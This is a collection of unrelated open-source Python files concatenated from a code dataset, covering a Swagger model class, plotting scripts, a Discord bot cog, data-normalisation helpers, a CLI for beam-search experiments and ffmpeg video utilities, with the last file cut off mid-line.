MetaData # noqa: F401,E501\nfrom swagger_server import util\n\n\nclass Updatealert(Model):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n def __init__(self, id: str=None, info: str=None, is_ack: bool=None, is_read: bool=None, is_discarded: bool=None, is_muted: bool=None, meta_data: MetaData=None, action: Action=None): # noqa: E501\n \"\"\"Updatealert - a model defined in Swagger\n\n :param id: The id of this Updatealert. # noqa: E501\n :type id: str\n :param info: The info of this Updatealert. # noqa: E501\n :type info: str\n :param is_ack: The is_ack of this Updatealert. # noqa: E501\n :type is_ack: bool\n :param is_read: The is_read of this Updatealert. # noqa: E501\n :type is_read: bool\n :param is_discarded: The is_discarded of this Updatealert. # noqa: E501\n :type is_discarded: bool\n :param is_muted: The is_muted of this Updatealert. # noqa: E501\n :type is_muted: bool\n :param meta_data: The meta_data of this Updatealert. # noqa: E501\n :type meta_data: MetaData\n :param action: The action of this Updatealert. # noqa: E501\n :type action: Action\n \"\"\"\n self.swagger_types = {\n 'id': str,\n 'info': str,\n 'is_ack': bool,\n 'is_read': bool,\n 'is_discarded': bool,\n 'is_muted': bool,\n 'meta_data': MetaData,\n 'action': Action\n }\n\n self.attribute_map = {\n 'id': 'id',\n 'info': 'info',\n 'is_ack': 'isAck',\n 'is_read': 'isRead',\n 'is_discarded': 'isDiscarded',\n 'is_muted': 'isMuted',\n 'meta_data': 'metaData',\n 'action': 'action'\n }\n self._id = id\n self._info = info\n self._is_ack = is_ack\n self._is_read = is_read\n self._is_discarded = is_discarded\n self._is_muted = is_muted\n self._meta_data = meta_data\n self._action = action\n\n @classmethod\n def from_dict(cls, dikt) -> 'Updatealert':\n \"\"\"Returns the dict as a model\n\n :param dikt: A dict.\n :type: dict\n :return: The updatealert of this Updatealert. # noqa: E501\n :rtype: Updatealert\n \"\"\"\n return util.deserialize_model(dikt, cls)\n\n @property\n def id(self) -> str:\n \"\"\"Gets the id of this Updatealert.\n\n id of the alert # noqa: E501\n\n :return: The id of this Updatealert.\n :rtype: str\n \"\"\"\n return self._id\n\n @id.setter\n def id(self, id: str):\n \"\"\"Sets the id of this Updatealert.\n\n id of the alert # noqa: E501\n\n :param id: The id of this Updatealert.\n :type id: str\n \"\"\"\n if id is None:\n raise ValueError(\"Invalid value for `id`, must not be `None`\") # noqa: E501\n\n self._id = id\n\n @property\n def info(self) -> str:\n \"\"\"Gets the info of this Updatealert.\n\n info of the alert # noqa: E501\n\n :return: The info of this Updatealert.\n :rtype: str\n \"\"\"\n return self._info\n\n @info.setter\n def info(self, info: str):\n \"\"\"Sets the info of this Updatealert.\n\n info of the alert # noqa: E501\n\n :param info: The info of this Updatealert.\n :type info: str\n \"\"\"\n\n self._info = info\n\n @property\n def is_ack(self) -> bool:\n \"\"\"Gets the is_ack of this Updatealert.\n\n acknowlegement # noqa: E501\n\n :return: The is_ack of this Updatealert.\n :rtype: bool\n \"\"\"\n return self._is_ack\n\n @is_ack.setter\n def is_ack(self, is_ack: bool):\n \"\"\"Sets the is_ack of this Updatealert.\n\n acknowlegement # noqa: E501\n\n :param is_ack: The is_ack of this Updatealert.\n :type is_ack: bool\n \"\"\"\n\n self._is_ack = is_ack\n\n @property\n def is_read(self) -> bool:\n \"\"\"Gets the is_read of this Updatealert.\n\n readed or not # noqa: E501\n\n :return: The is_read of this Updatealert.\n :rtype: bool\n \"\"\"\n return self._is_read\n\n @is_read.setter\n def is_read(self, is_read: bool):\n \"\"\"Sets the is_read of this Updatealert.\n\n readed or not # noqa: E501\n\n :param is_read: The is_read of this Updatealert.\n :type is_read: bool\n \"\"\"\n\n self._is_read = is_read\n\n @property\n def is_discarded(self) -> bool:\n \"\"\"Gets the is_discarded of this Updatealert.\n\n is it discarded or not # noqa: E501\n\n :return: The is_discarded of this Updatealert.\n :rtype: bool\n \"\"\"\n return self._is_discarded\n\n @is_discarded.setter\n def is_discarded(self, is_discarded: bool):\n \"\"\"Sets the is_discarded of this Updatealert.\n\n is it discarded or not # noqa: E501\n\n :param is_discarded: The is_discarded of this Updatealert.\n :type is_discarded: bool\n \"\"\"\n\n self._is_discarded = is_discarded\n\n @property\n def is_muted(self) -> bool:\n \"\"\"Gets the is_muted of this Updatealert.\n\n whether muted or not # noqa: E501\n\n :return: The is_muted of this Updatealert.\n :rtype: bool\n \"\"\"\n return self._is_muted\n\n @is_muted.setter\n def is_muted(self, is_muted: bool):\n \"\"\"Sets the is_muted of this Updatealert.\n\n whether muted or not # noqa: E501\n\n :param is_muted: The is_muted of this Updatealert.\n :type is_muted: bool\n \"\"\"\n\n self._is_muted = is_muted\n\n @property\n def meta_data(self) -> MetaData:\n \"\"\"Gets the meta_data of this Updatealert.\n\n\n :return: The meta_data of this Updatealert.\n :rtype: MetaData\n \"\"\"\n return self._meta_data\n\n @meta_data.setter\n def meta_data(self, meta_data: MetaData):\n \"\"\"Sets the meta_data of this Updatealert.\n\n\n :param meta_data: The meta_data of this Updatealert.\n :type meta_data: MetaData\n \"\"\"\n\n self._meta_data = meta_data\n\n @property\n def action(self) -> Action:\n \"\"\"Gets the action of this Updatealert.\n\n\n :return: The action of this Updatealert.\n :rtype: Action\n \"\"\"\n return self._action\n\n @action.setter\n def action(self, action: Action):\n \"\"\"Sets the action of this Updatealert.\n\n\n :param action: The action of this Updatealert.\n :type action: Action\n \"\"\"\n\n self._action = action\n","repo_name":"Surya2709/FlaskSwaggerDemo","sub_path":"swagger_server/models/updatealert.py","file_name":"updatealert.py","file_ext":"py","file_size_in_byte":6901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14059059346","text":"#!/usr/bin/python3\n\"\"\"A scripts that sends a post request\"\"\"\nimport sys\nimport requests\n\n\nif __name__ == \"__main__\":\n url = sys.argv[1]\n values = {\"email\": sys.argv[2]}\n\n response = requests.post(url, data=values)\n print(response.text)\n","repo_name":"UmarFarukA/alx-higher_level_programming","sub_path":"0x11-python-network_1/6-post_email.py","file_name":"6-post_email.py","file_ext":"py","file_size_in_byte":248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23387269277","text":"#!/home/raul/miniconda3/envs/py27/bin/python -W ignore::VisibleDeprecationWarning\n\n\"\"\"\nCreated on Wed Jul 20 11:22:43 2016\n\n@author: raul\n\"\"\"\nimport numpy as np\nimport sounding as so\nimport Meteoframes as mf\nimport matplotlib.pyplot as plt\nfrom rv_utilities import discrete_cmap\nfrom matplotlib import rcParams\n\nrcParams['xtick.labelsize'] = 15\nrcParams['ytick.labelsize'] = 15\nrcParams['legend.fontsize'] = 15\nrcParams['axes.labelsize'] = 15\nrcParams['legend.handletextpad'] = 0.2\nrcParams['mathtext.default'] = 'sf'\n\nscale=1.2\nfig,axes = plt.subplots(2,1,sharex=True,figsize=(5*scale,10*scale))\naxes[0].set_gid('(a) 23-24Jan01')\naxes[1].set_gid('(b) 17Feb01')\n\nnobs=('n=7','n=11')\n\ninfiles3,_ = so.get_sounding_files('3', homedir='/localdata')\ninfiles7,_ = so.get_sounding_files('7', homedir='/localdata')\n\ncmap = discrete_cmap(7, base_cmap='Set1')\ncolor=(cmap(0),cmap(1))\n\ninfiles=(infiles3,infiles7)\n\n\nfor n,ax in enumerate(axes):\n\n first = True\n for f in infiles[n]:\n df = mf.parse_sounding2(f)\n x = np.expand_dims(df.bvf_moist.values,axis=1)*10000\n y = np.expand_dims(df.index.values,axis=1)\n ax.plot(x,y,color=color[n],lw=0.5)\n top = 2000 # [m]\n top_idx = np.where(y == top)[0]\n if first is True: \n prof = x[:top_idx]\n first = False\n else:\n prof = np.hstack((prof,x[:top_idx]))\n meanx = np.expand_dims(np.nanmean(prof,axis=1),axis=1)\n y2 = y[:top_idx]\n ax.plot(meanx,y2,color=color[n],lw=3)\n xpos = 0.08\n ax.text(xpos,0.9,ax.get_gid(),\n fontsize=15,\n weight='bold',\n transform=ax.transAxes,\n )\n ax.text(xpos+0.07,0.85,nobs[n],\n fontsize=15,\n weight='bold',\n transform=ax.transAxes, \n ) \n \n ax.set_xlim([-4,4])\n ax.set_ylim([0,2000])\n ax.axvline(0,color='k',linestyle=':',lw=3)\n \naxes[0].set_ylabel('Altitude MSL [m]')\naxes[1].set_xlabel(r'$N_{m}^{2} [x10^{-4} s^{-2}]$')\n#plt.legend(bbox_to_anchor=(0., 1.02, 1., .102), loc=3,\n# ncol=2, mode=\"expand\", borderaxespad=0.)\n\nplt.subplots_adjust(hspace=0.05)\n\n#plt.show()\n\nfname='/home/raul/Desktop/fig_N2.png'\nplt.savefig(fname, dpi=150, format='png',papertype='letter',\n bbox_inches='tight')\n","repo_name":"rvalenzuelar/sounding_vis","sub_path":"figure_bvf_case_3_and_7.py","file_name":"figure_bvf_case_3_and_7.py","file_ext":"py","file_size_in_byte":2302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18746631913","text":"# https://leetcode.com/problems/find-the-highest-altitude/\n\n\"\"\"\n\nProblem Description \n\nThere is a biker going on a road trip. The road trip consists of n + 1 points at different altitudes. The biker starts his trip on point 0 with altitude equal 0.\n\nYou are given an integer array gain of length n where gain[i] is the net gain in altitude between points i and i + 1 for all \n(0 <= i < n). Return the highest altitude of a point.\n\n\"\"\"\n\n# Time Complexity Space Complexity\n# O(n)\t\t\t\t O(n)\n\nclass Solution:\n def largestAltitude(self, gain: List[int]) -> int:\n sum=0\n altitude = [0]\n for each_gain in gain:\n sum+=each_gain\n altitude.append(sum)\n return max(altitude)\n","repo_name":"SanthoshS20/Leet_Code_Problems_Solution","sub_path":"Python Language/ProblemID_1732.py","file_name":"ProblemID_1732.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"20131034951","text":"# Author: Nam Tran\n# Date: 2020-10-21\n\n# This code creates the two distribution plots (horizontal and vertical), requiring two files as input:\n# horizontal_prediction_error and vertical_prediction_error. These two input files can be generated \n# from neural_network.py by writing out the error. \n\nimport numpy as np\nimport csv\nimport random\nfrom scipy import stats\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport multiprocessing\nimport statistics\nimport pandas as pd\n\nwith open(\"horizontal_prediction_error\", \"r\", newline = \"\") as f:\n reader = csv.reader(f)\n h_data = list(reader)\n\nwith open(\"vertical_prediction_error\", \"r\", newline = \"\") as f:\n reader = csv.reader(f)\n v_data = list(reader)[:len(h_data)]\n\ncomponents = [\"X-component\", \"Y-component\", \"Z-component\"]\n\nh_error = {}\nv_error = {}\nfor c in components:\n h_error[c] = []\n v_error[c] = []\n\nfor i in range(len(v_data)):\n for j in range(len(v_data[i])):\n h_data[i][j] = float(h_data[i][j])\n v_data[i][j] = float(v_data[i][j])\n v_error[\"X-component\"].append(v_data[i][0])\n v_error[\"Y-component\"].append(v_data[i][1])\n v_error[\"Z-component\"].append(v_data[i][2])\n\n h_error[\"X-component\"].append(h_data[i][0])\n h_error[\"Y-component\"].append(h_data[i][1])\n h_error[\"Z-component\"].append(h_data[i][2])\n\n\ncolors = [\"magenta\", \"tan\", \"lime\"]\n\ndf_v=pd.DataFrame.from_dict(v_error,orient='index').transpose()\n\n\nf, axs = plt.subplots(3, sharex=False, gridspec_kw={'hspace': 0.65}) # \"height_ratios\": (.16, .16, .16, .16, .16, .16)\n\nc_palette = {\"X-component\": \"magenta\",\"Y-component\": \"tan\", \"Z-component\": \"lime\"}\n#sns.violinplot(data=df_v, palette = c_palette, orient=\"h\").set(\n# xlabel='Error (N)'\n#) #ax=axs[0]\nsns.distplot(df_v[\"X-component\"], ax=axs[0], color = colors[0], hist = False, kde = True).set(\n xlabel='Error for X-Component (N)', \n ylabel='Density'\n)\nsns.distplot(df_v[\"Y-component\"], ax=axs[1], color = colors[1], hist = False, kde = True).set(\n xlabel='Error for Y-component (N)', \n ylabel='Density'\n)\nsns.distplot(df_v[\"Z-component\"], ax=axs[2], color = colors[2], hist = False, kde = True).set(\n xlabel='Error for Z-component (N)', \n ylabel='Density'\n)\nf.suptitle(\"Error Distribution for Vertical Configuration\")\n\n\n\ndf_h=pd.DataFrame.from_dict(h_error,orient='index').transpose()\n\n\nf_h, axs_h = plt.subplots(3, sharex=False, gridspec_kw={'hspace': 0.65}) # \"height_ratios\": (.16, .16, .16, .16, .16, .16)\n\n#sns.violinplot(data=df_h, palette = c_palette, orient=\"h\").set( \n# xlabel='Error (N)'\n#) #ax=axs_h[0], \n\nsns.distplot(df_h[\"X-component\"], ax=axs_h[0], color = colors[0], hist = False, kde = True).set(\n xlabel='Error for X-component (N)', \n ylabel='Density'\n)\nsns.distplot(df_h[\"Y-component\"], ax=axs_h[1], color = colors[1], hist = False, kde = True).set(\n xlabel='Error for Y-component (N)', \n ylabel='Density'\n)\nsns.distplot(df_h[\"Z-component\"], ax=axs_h[2], color = colors[2], hist = False, kde = True).set(\n xlabel='Error for Z-component (N)', \n ylabel='Density'\n)\nf_h.suptitle(\"Error Distribution for Horizontal Configuration\")\n\nsns.set(font_scale=2)\nplt.show()\n \n#import pdb; pdb.set_trace()\n#mu=np.array([1,10,20])\n# Let's change this so that the points won't all lie in a plane...\n#sigma=np.matrix([[20,10,10],\n# [10,25,1],\n# [10,1,50]])\n\n#data=np.random.multivariate_normal(mu,sigma,1000)\n#random.shuffle(data)\n#data = np.array(data[:10000])\n#values = data.T\n\n'''x = np.array(x)\ny = np.array(y)\nz = np.array(z)\n\n#print(x.shape)\n\nxyz = np.vstack([x,y,z])\nkde = stats.gaussian_kde(xyz)\n\n\ndef calc_kde(data):\n print(len(data))\n return kde(data.T)\n\ndef main():\n\n\n # Evaluate kde on a grid\n xmin, ymin, zmin = x.min(), y.min(), z.min()\n xmax, ymax, zmax = x.max(), y.max(), z.max()\n xi, yi, zi = np.mgrid[xmin:xmax:30j, ymin:ymax:30j, zmin:zmax:30j]\n coords = np.vstack([item.ravel() for item in [xi, yi, zi]]) \n\n cores = multiprocessing.cpu_count()\n pool = multiprocessing.Pool(processes=4)\n results = pool.map(calc_kde, np.array_split(coords.T, 2))\n density = np.concatenate(results).reshape(xi.shape)\n #density = kde(coords).reshape(xi.shape)\n\n # Plot scatter with mayavi\n figure = mlab.figure('DensityPlot')\n\n grid = mlab.pipeline.scalar_field(xi, yi, zi, density)\n min = density.min()\n max = density.max()\n mlab.pipeline.volume(grid, vmin=min ,vmax=min + .8*(max-min)) #, vmin=min ,vmax=min + .5*(max-min)\n\n mlab.axes()\n mlab.savefig(filename='test.png', magnification = 10)\n mlab.show()\n\nif __name__ == '__main__': \n main()\n\n'''","repo_name":"JieYingWu/dvrk_force_estimation","sub_path":"direct_method/error_distribution.py","file_name":"error_distribution.py","file_ext":"py","file_size_in_byte":4625,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"43738006889","text":"#!/usr/bin/env python3\n# snippet01a.py\n# Micah Raabe\n\n# Lab 32 - Snippet.split.join\n\ntxtfile = open('ls_mycode.txt', 'r')\ntxtfile_list = txtfile.readlines()\ntxtfile.close()\n\nfor i in range(len(txtfile_list)):\n txtfile_list[i] = txtfile_list[i].strip() # strip out the newline characters\n\ntxtfile_lista = \" \".join(txtfile_list) # join the list with a single whitespace\nprint('\\n' + txtfile_lista)\n\ntxtfile_listb = \"\\t\".join(txtfile_list) # join the list with a tab\nprint('\\n' + txtfile_listb)\n\n","repo_name":"gmraabe/mycode","sub_path":"snippet01/snippet01a.py","file_name":"snippet01a.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"21"} +{"seq_id":"7813869441","text":"\ndef shiny_gold_size(values, value=1, bag=\"shiny gold bag\", res=0):\n stores = values[bag]\n if not stores:\n return res\n for k, v in stores.items():\n res += v * value\n res = shiny_gold_size(values, v * value, k, res)\n return res\n\n\ndef main():\n with open('input.txt') as f:\n lines = f.read().splitlines()\n formatted_values = {}\n for line in lines:\n key, values = line.split(\" contain \")\n key = key[:-1]\n values = values.split(\", \")\n formatted_values[key] = {}\n for value in values:\n value = value.replace(\"bags\", \"bag\").replace(\".\", \"\")\n amount, name = value.split(\" \", 1)\n if amount != \"no\":\n formatted_values[key][name] = int(amount)\n else:\n formatted_values[key] = None\n print(formatted_values)\n print(f\"Result is {shiny_gold_size(formatted_values)}\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"schovancova/adventOfCode2020","sub_path":"7/solution_part_2.py","file_name":"solution_part_2.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10206288190","text":"import discord\nfrom discord.ext import commands\nimport datetime \n\nEMOJIS = [\n \"1️⃣\",\n \"2️⃣\",\n \"3️⃣\",\n \"4️⃣\",\n \"5️⃣\",\n \"6️⃣\",\n \"7️⃣\",\n \"8️⃣\",\n \"9️⃣\",\n \"🔟\"\n]\n\nclass MoviesRater(commands.Cog):\n def __init__(self,client):\n self.client = client\n\n @commands.has_role('Moderators')\n @commands.command()\n async def movie(self, ctx, *, title):\n embed = discord.Embed(\n title=f\"{title}\",\n colour=1234567,\n timestamp=datetime.datetime.utcnow()\n )\n message = await ctx.send(embed=embed)\n for emoji in EMOJIS:\n await message.add_reaction(emoji)\n\ndef setup(client):\n client.add_cog(MoviesRater(client))","repo_name":"Sajan491/Asuma","sub_path":"cogs/moviesRater.py","file_name":"moviesRater.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14116555584","text":"from tkinter import*\n\n\ndef Logout():\n root1=Tk()\n root1.title(\"LogOut\")\n root1.geometry(\"400x300\")\n root1.configure(bg='light blue')\n label2=Label(root1,text=\"Logout Successful\",font=(\"Nueva Std Cond\",15,\"bold\"),fg='green',bg='light blue').place(x=100.5,y=120.0)\n root1.after(2000, lambda: root1.destroy())\n root1.mainloop()","repo_name":"kasthuri28/Blithe","sub_path":"src/Logout.py","file_name":"Logout.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12917100547","text":"## imporation\nimport shutil\nimport os\nimport numpy as np\nimport glob\n\n\ndef load_raw_dataset(label_to_file, output_folder):\n \"\"\"\n \"\"\"\n\n ## paramaters\n file_list = []\n\n ## create file list\n for k in label_to_file:\n flist = label_to_file[k]\n for f in flist:\n if(f not in file_list):\n file_list.append(f)\n\n ## create raw sub folder\n if(not os.path.isdir(output_folder+\"/raw_data\")):\n os.mkdir(output_folder+\"/raw_data\")\n\n ## copy all files into raw sub folder\n for f in file_list:\n destination = f.split(\"/\")\n destination = destination[-1]\n destination = output_folder+\"/raw_data/\"+destination\n shutil.copy(f, destination)\n\n\n\n\ndef normalize_dataset(output_folder):\n \"\"\"\n IN PROGRESS\n \"\"\"\n\n ## importation\n import pandas as pd\n\n ## parameters\n marker_to_scalar = {}\n marker_to_mean = {}\n marker_to_std = {}\n marker_list = []\n\n ## create normalized sub folder\n if(not os.path.isdir(output_folder+\"/normalized_data\")):\n os.mkdir(output_folder+\"/normalized_data\")\n\n ## identify target files & markers\n target_files = glob.glob(output_folder+\"/raw_data/*.csv\")\n df = pd.read_csv(target_files[0])\n for k in list(df.keys()):\n if(k not in [\"centroid_X\", \"centroid_Y\"]):\n marker_list.append(k)\n marker_to_scalar[k] = []\n\n ## Part 1 - get the mean and std for all markers\n for tf in target_files:\n\n #-> load data\n df = pd.read_csv(tf)\n\n #-> loop over data & get scalars for each markers\n for index, row in df.iterrows():\n for k in list(row.keys()):\n if(k in marker_list):\n marker_to_scalar[k].append(row[k])\n\n ## compute mean and std\n for k in marker_to_scalar.keys():\n vector = marker_to_scalar[k]\n marker_to_mean[k] = np.mean(vector)\n marker_to_std[k] = np.std(vector)\n\n ## Part 2 - Apply standardization\n ## loop over fcs file\n for tf in target_files:\n\n #-> load dataframe\n df = pd.read_csv(tf)\n\n #-> apply standardization\n for marker in marker_list:\n df[marker] = ((df[marker] - marker_to_mean[marker]) / marker_to_std[marker])\n\n #-> save dataframe to normalize file\n output_name = tf.replace(\".csv\", \"_normalized.csv\")\n output_name = output_name.replace(\"raw_data\", \"normalized_data\")\n df.to_csv(output_name, index=False)\n\n\n\n\ndef simple_discretization(output_folder):\n \"\"\"\n \"\"\"\n\n ## importation\n import pandas as pd\n import glob\n\n ## create normalized sub folder\n if(not os.path.isdir(output_folder+\"/discretized_data\")):\n os.mkdir(output_folder+\"/discretized_data\")\n\n ## loop over target files\n for tf in glob.glob(output_folder+\"/normalized_data/*_normalized.csv\"):\n\n #-> init new matrix\n matrix = []\n\n #-> load target files\n df = pd.read_csv(tf)\n\n #-> get header\n header = list(df.keys())\n\n #-> discretize\n for index, row in df.iterrows():\n vector = []\n for k in list(row.keys()):\n if(k in [\"centroid_X\", \"centroid_Y\"]):\n vector.append(row[k])\n else:\n scalar = row[k]\n new_scalar = \"NA\"\n\n #--> discretize\n if(scalar < 0.2):\n new_scalar = 0\n elif(scalar < 0.4):\n new_scalar = 1\n elif(scalar < 0.6):\n new_scalar = 2\n elif(scalar < 0.8):\n new_scalar = 3\n elif(scalar <= 1):\n new_scalar = 4\n elif(scalar <= 2):\n new_scalar = 5\n else:\n new_scalar = 6\n\n # update vector\n vector.append(new_scalar)\n\n # update matrix\n matrix.append(vector)\n\n ## craft and save csv\n df = pd.DataFrame(matrix, columns=header)\n output_name = tf.replace(\".csv\", \"_discretized.csv\")\n output_name = output_name.replace(\"normalized_data\", \"discretized_data\")\n df.to_csv(output_name, index=False)\n","repo_name":"Nurtal/HYPERNET","sub_path":"dataset_manager.py","file_name":"dataset_manager.py","file_ext":"py","file_size_in_byte":4337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70090440374","text":"import gzip\n\nfrom Bio import SeqIO\n\nwith gzip.open(snakemake.output.comb, \"wt\") as combOut, \\\n open(snakemake.output.sample, \"w\") as sampleOut, \\\n open(snakemake.output.name, \"w\") as nameOut:\n for sample, fileInfo in snakemake.params.files.items():\n #print(fileInfo)\n for inFile in fileInfo[int(snakemake.wildcards.readNum)-1]:\n with gzip.open(\"%s/%s\" % (snakemake.config[\"inFolder\"], inFile), \"rt\") as inStream:\n for rec in SeqIO.parse(inStream, \"fastq\"):\n newId = \"_\".join(rec.id.split(\":\")[2:])\n nameOut.write(\"%s\\t%s\\n\" % (rec.id, newId))\n rec.id = newId\n combOut.write(rec.format(\"fastq\"))\n sampleOut.write(\"%s\\t%s\\n\" % (newId, sample))\n","repo_name":"f-heeger/two_marker_metabarcoding","sub_path":"scripts/concatAll.py","file_name":"concatAll.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"24438951592","text":"from pathlib import Path\nfrom typing import Optional, Sequence, TypeAlias, Literal\n\nimport click\n\nExperimentName: TypeAlias = Literal[\"rxn\", \"additions\"]\n\n\n@click.group\ndef dyn_beam_cli():\n pass\n\n\n@dyn_beam_cli.command()\n@click.option(\"--experiment\", \"-x\", type=click.Choice([\"rxn\", \"additions\"]), required=True)\n@click.option(\"--out_path\", \"-o\", type=click.Path(exists=True, path_type=Path), required=True)\n@click.option(\"--config\", \"-c\", type=click.Path(exists=True, path_type=Path), required=True)\n@click.option(\"--n_rep\", \"-n\", type=int, required=False)\n@click.option(\"--alphas\", \"-a\", type=float, required=False, multiple=True)\n@click.option(\"--seed\", \"-s\", type=int, required=False)\n@click.option(\"--pb/--no-pb\", default=True)\ndef predict(\n experiment: ExperimentName,\n out_path: Path,\n config: Path,\n n_rep: Optional[int] = None,\n alphas: Optional[Sequence[float]] = None,\n seed: Optional[int] = None,\n pb: bool = True,\n):\n \"\"\"Experiment entry point\n Usage: python -m confbeam_experiment.dyn_beams predict -x additions -o -c config.yaml\n \"\"\"\n # Importing in command to avoid long startup due to imports\n from confbeam_experiments.dyn_beams.cli import run_dynamic_beam_repetitions\n\n run_dynamic_beam_repetitions(\n experiment=experiment,\n out_path=out_path,\n config_path=config,\n n_rep=n_rep,\n alphas=alphas,\n seed=seed,\n progress_bar=pb,\n )\n\n\n@dyn_beam_cli.command()\n@click.option(\"--exp_dir\", type=click.Path(exists=True, path_type=Path), required=True)\n@click.option(\n \"--out_dir\",\n type=click.Path(exists=True, path_type=Path),\n required=False,\n default=None,\n)\ndef analyze(exp_dir: Path, out_dir: Optional[Path] = None):\n \"\"\"Aggregation entry point\n Usage: python -m confbeam_experiment.dyn_beams analze --exp_dir \n \"\"\"\n # Importing in command to avoid long startup due to imports\n from confbeam_experiments.dyn_beams.analysis import collect_result_from_dir\n from confbeam_experiments.dyn_beams.cli import dyn_beam_aggregate_results\n\n all_results = collect_result_from_dir(exp_dir)\n if out_dir is None:\n out_dir = exp_dir\n dyn_beam_aggregate_results(experiment_results=all_results, out_dir=out_dir)\n\n\nif __name__ == \"__main__\":\n dyn_beam_cli()\n","repo_name":"IBM/conformal_beam_search","sub_path":"src/confbeam_experiments/dyn_beams/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":2335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1324150119","text":"import shutil\nimport uuid\nimport time\n\nimport os\nimport subprocess\n\nimport cv2\nimport random\nfrom tqdm import tqdm\nimport numpy as np\nfrom PIL import Image\n\n\ndef load_video_to_cv2(input_path):\n video_stream = cv2.VideoCapture(input_path)\n fps = video_stream.get(cv2.CAP_PROP_FPS)\n full_frames = [] \n while 1:\n still_reading, frame = video_stream.read()\n if not still_reading:\n video_stream.release()\n break \n full_frames.append(cv2.cvtColor(frame, cv2.COLOR_BGR2RGB))\n return full_frames\n\n\ndef save_video_with_audio(video, audio, save_path):\n file_name = str(uuid.uuid4()) + '.mp4'\n save_file = os.path.join(save_path, file_name)\n if os.path.exists(audio):\n # If there is an audio file, include it in the ffmpeg command\n cmd = r'ffmpeg -y -i \"%s\" -i \"%s\" -c:v libx264 -c:a aac -crf 23 -preset medium -movflags +faststart -shortest \"%s\"' % (video, audio, save_file)\n else:\n # If there is no audio file, omit the audio input and codec options\n cmd = r'ffmpeg -y -i \"%s\" -c:v libx264 -crf 23 -preset medium -movflags +faststart \"%s\"' % (video, save_file)\n if os.environ.get('DEBUG', 'False') == 'True':\n # not silence run\n os.system(cmd)\n else:\n # silence run\n subprocess.run(cmd, shell=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)\n return file_name\n\n\ndef save_video_from_frames(frame_names, save_path, fps, alternative_save_path=None):\n # frames has to have name from 0\n frame_path = os.path.join(save_path, frame_names)\n file_name = str(uuid.uuid4())+'.mp4'\n if alternative_save_path:\n save_file = os.path.join(alternative_save_path, file_name)\n else:\n save_file = os.path.join(save_path, file_name)\n cmd = f'ffmpeg -framerate {fps} -i {frame_path} -c:v libx264 -vf \"pad=ceil(iw/2)*2:ceil(ih/2)*2\" -pix_fmt yuv420p {save_file}'\n if os.environ.get('DEBUG', 'False') == 'True':\n # not silence run\n os.system(cmd)\n else:\n # silence run\n subprocess.run(cmd, shell=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)\n return file_name\n\n\ndef video_to_frames(video_path, output_folder, start_seconds=0, end_seconds=None, extract_nth_frame=1, reduce_size=1):\n start_hms = seconds_to_hms(start_seconds)\n if end_seconds is not None:\n select_cmd = f\"select=between(t\\\\,{start_seconds}\\\\,{end_seconds})*not(mod(n\\\\,{extract_nth_frame}))\"\n else:\n select_cmd = f\"select=not(mod(n\\\\,{extract_nth_frame}))\"\n # Add the scale filter to reduce frame size by a factor\n vf_cmd = f\"{select_cmd},scale=iw/{int(reduce_size)}:ih/{int(reduce_size)}\" if reduce_size > 1 else select_cmd\n cmd = f'ffmpeg -ss {start_hms} -i \"{video_path}\" -vf \"{vf_cmd}\" -vsync vfr \"{output_folder}/%d.png\"'\n if os.environ.get('DEBUG', 'False') == 'True':\n # not silence run\n os.system(cmd)\n else:\n # silence run\n subprocess.run(cmd, shell=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)\n\n\ndef extract_audio_from_video(video_path, save_path):\n # Check if the file is a GIF\n try:\n with Image.open(video_path) as img:\n if img.format == 'GIF':\n print(f\"Skipping audio extraction because the file is a GIF\")\n return None\n except Exception as e:\n print(f\"Unable to determine image format: {e}\")\n\n # If not a GIF, proceed with audio extraction\n file_name = str(uuid.uuid4()) + '.wav'\n save_file = os.path.join(save_path, file_name)\n cmd = f'ffmpeg -i \"{video_path}\" -q:a 0 -map a? \"{save_file}\" -y'\n if os.environ.get('DEBUG', 'False') == 'True':\n # not silence run\n os.system(cmd)\n else:\n # silence run\n subprocess.run(cmd, shell=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)\n return file_name\n\n\ndef seconds_to_hms(seconds):\n hours, remainder = divmod(seconds, 3600)\n minutes, seconds = divmod(remainder, 60)\n return \"{:02}:{:02}:{:02}.{:03}\".format(int(hours), int(minutes), int(seconds), int((seconds % 1) * 1000))\n\n\ndef cut_start_video(video, video_start, video_end):\n if video_start == video_end:\n return video\n time.sleep(5)\n hms_start_format = seconds_to_hms(video_start)\n hms_end_format = seconds_to_hms(video_end)\n print(f\"Video will start from {hms_start_format} and end at {hms_end_format}\")\n new_video = f\"{video}_cut.mp4\"\n cmd = f\"ffmpeg -y -ss {hms_start_format} -to {hms_end_format} -i {video} -c copy {new_video}\"\n if os.environ.get('DEBUG', 'False') == 